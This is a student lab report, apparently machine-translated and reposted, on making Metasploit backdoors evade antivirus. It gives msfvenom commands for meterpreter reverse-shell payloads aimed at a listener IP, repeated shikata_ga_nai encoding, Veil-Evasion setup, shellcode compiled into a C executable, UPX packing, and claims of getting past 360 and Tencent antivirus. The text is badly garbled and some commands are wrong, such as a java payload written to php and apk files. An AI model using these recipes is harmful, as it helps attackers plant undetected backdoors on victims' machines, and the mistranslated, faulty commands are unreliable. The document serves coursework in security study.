2019-2020-2 20,175,316 Song Sheng-mao "Network Warfare Technology" Exp3 free to kill Principles and Practice

Others 2020-04-04 06:18:38 views: null

2019-2020-2 20,175,316 Song Sheng-mao "Network Warfare Technology" Exp3 free to kill Principles and Practice

First, the test target

  • Familiar with the concept of the back door
  • Use netcat achieved win, the back door is connected between linux
  • Master the application of meterpreter
  • MSF POST understand the application module
  • Learn to win, linux backdoor way to start

Second, the basic questions answered

1. How to kill soft is detected malicious code?

  • Signature-based detection (need to regularly update the virus database)
  • Heuristic malware detection (real-time monitoring, large overhead)
  • Malware detection (such as API monitoring) behavior-based

2. What do free to kill?

  • Disguises, encryption and decryption of shellcode deformed by overwriting veil recompiling other means to prevent the generation of soft backdoor detected killed

3. The basic methods to avoid killing

  • Change signature
    • Packers (has .exe file)
      • Compression Shell
      • Encryption shell
    • shellcode+encoder
    • Rewriting recompile (veil-evasion or manual)
    • Semi-manual of the (mainstream)
  • Change behavior
    • communication method
      • Try to use a rebound connection
      • Use the tunnel technology
      • Data encrypted communications (e.g., https)
    • operating system
      • RAM-based operation
      • Reduce the modification of the system
      • Join confuse the role of the normal function of the code

Third, the experimental content

A Task: Use proper msf encoder, msfvenom generates other files, such as a jar or the like, Veil, a packer, using C + shellcode programming method does not describe the use of other classes

1. Detection avoid killing

  • In the second experiment using msf generate a backdoor program that can use VirusTotalor Virscanor two sites to generate a backdoor to scan.

    • After VirusTotal scan results were as follows: 72 of 58 soft kill the virus reported, without backdoor process can be detected most of the soft kill

    • Msfvenom is a tool used to encode the next platform Metasploit payloads to avoid killing. In Metaspliot visibility and popularity, as long as a new coding algorithm, wherein the AV manufacturers will immediately added to the database.

2. msf determined using an encoder to generate the exe

  • After encoding it, according to the theory, it will reduce the detection rate coding, coding theory, more than a few times, always check it out.
  • Pass encoding using the command: -eselect encoder -bis payload needs to be removed in character, in order that the command '\x00'does not appear shellcode because shellcode to '\x00'as terminator
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.136.129 LPORT=5316 -f exe > met-encoded.exe

  • Ten coded generating backdoor:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.136.128 LPORT=5316 -f exe > encoded10.exe

  • This shows that although the probability of coding after being detected declined, but most kill soft or it can be detected.

3.msfvenom generate other documents

  • Generate java backdoor using the command:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x > 20175316jar.jar

  • VirusTotal test results:

  • Jsp files generated:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316jsp.jsp

  • VirusTotal test results:

  • Generate php file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316php.php

  • Use VirusTotal scan results are as follows, that obviously a lot less

  • Generated apk file:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 x> 20175316apk.apk

  • VirusTotal test results:

4. veil-evasion generation and detection backdoor

  • With the sudo apt-get install veilcommand to install Veil, after untold hardships, in the end the problem with the installation encountered and solutions

  • success

  • Veil instruction input into the interface as a

  • Entryuse evasion

  • After you enter the command use c/meterpreter/rev_tcp.pyto enter configuration interface

  • Use set LHOST 192.168.136.128Set connection rebound IP address (IP note here is that the virtual machine's IP Kali)

  • Use set LPORT 5316Set Port

  • Use the generatecommand to generate a file, and then enter the name playload generated veil20175316, saved path/var/lib/veil/output/source/veil20175316.exe

  • Virustotal thrown in to see how the veil of secrecy generated

  • The results showed that veil effect is not very good, there are still more than half of it can kill the soft kick out

The injection and performs Shellcode (embedded Shellcode)

  • First, use the command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.136.128 LPORT=5316 -f c

  • Create a file 20175316.c, and then unsigned char buf[]assign to it, as follows:

  • Use the command: i686-w64-mingw32-g++ 20175316.c -o 20175316.execompile the .c file into an executable file

  • But using VirusTotal detect a lot of problems

6. packers tools

  • Compressing the shell is a corresponding resource, still run after compression.
  • The program requires packers to prevent an external program or software on the packer itself compilation, analysis or dynamic analysis, in order to protect the shell of the original program and the software is not destroyed external procedures to ensure the normal operation of the original program.
  • It can be used to protect copyrights, but many viruses also use it as a principle.

Use the command upx 201753167.exe -o 20175316_2.exe对20175316.exeshell

  • Uploaded to the virustotal

(After packers kill soft little that can be detected, but more than half of the soft kill or be detected)

7. Other methods

  • Using Veil-Evasionother load generating mode backdoor

  • enteruse evasion

  • Use listpayload View Available:

  • Select Loadcs/shellcode_inject/virtual.py

  • Enter optionto see the options of payload

  • 2 is selected to generate the generate, select platforms after modifying the user name shellcode

  • Enter the generated file name, select Py2Exe generate exe files

  • Thereafter, the resulting file into the path rc /var/lib/veil/output/handlers/, the executable file in the /var/lib/veil/output/source/in

  • Upload the executable file to see the effect in virustotal:

  • perfect

Task Two: By combining application of technology to avoid killing malicious code (if successfully achieved to avoid killing, simple language to describe the principles, do not want to capture screenshots and verify the results of soft kill symbiotic.)

  • method 1
    • Use msfvenom -l encoders See encoder may be used to generate different backdoor
    • After using a single coding method to generate a plurality of times of iterative array c shellcode language, then generates exe file, after the packers: using compressed shells (the UPX) and encryption shell (Hyperion)
  • Method 2
    • Using the previous Veil,c/meterpreter/rev_tcp.pygeneration of exe UPX compressed executable file plus shell can successfully escape Tencent Computer Manager
    • And then attached to the monitor and back kali

Task three: Measured using another computer, in the case of soft kill on, and run back to even succeed, kill the soft version marked with the name of the computer

  • Computer environment: win7
  • Soft kill Name: 360 security guards (11.5.0.2001)

Fourth, the problems encountered in experiments and solutions

Question 1

  • Is not installed veil
  • Solution
    1. Before installing the update to modify the source system
sudo su
apt-get purge veil-evasion
apt-get update
apt-get upgrade

2. Run the following commands wine32 mounted before installation:

mkdir -p ~/.cache/wine
cd ~/.cache/wine 
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

3. Use the command cd /usr/share/veil/config/into the folder, use ls to view the contents of the folder
using a command vim setup.shto edit the file, the first line of the github repository 251 yards into the cloud storage,https://gitee.com/spears/VeilDependencies.git

4. encounter the following problems behind the operation command

V. Summary and experimental insights

Even back often unsuccessful phenomenon, especially encryption shell, I think probably a metaphysics. (Yeah, I have not solved this problem)
emmm be honest, I did a successful test case when, after a few hours, you can not avoid killing. . Then if I changed shellcode, and re-do it again, can be achieved to avoid killing the computer butler update the virus database, or can it?
Still do not know in the absence of 360, Computer Manager barabara kill a bunch of soft case, how to kill the soft under windows defender (after all, I tried it all experiments are slag slag for windows defender ..)

Guess you like

Origin www.cnblogs.com/sms369/p/12621159.html
Recommended
NetBSD bans submission of code generated by AI
Ranking
Talk dubbo of LRUCache
Chapter 1 Learning Summary
Introduction to Virtualization
pytorch 调用lstm
Six modules
[8086] The natural number of 1 to 36 into a 6x6 two-dimensional array of line-sequentially, and then print out the lower left half of the triangular array
mybatis mapper mapping file $ # {} {} understanding and
C language input and output buffer
c language floating-point input and output
andorid P version compatible, refer to Huawei
Daily
More
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)

Code World

© 2018 codetd.com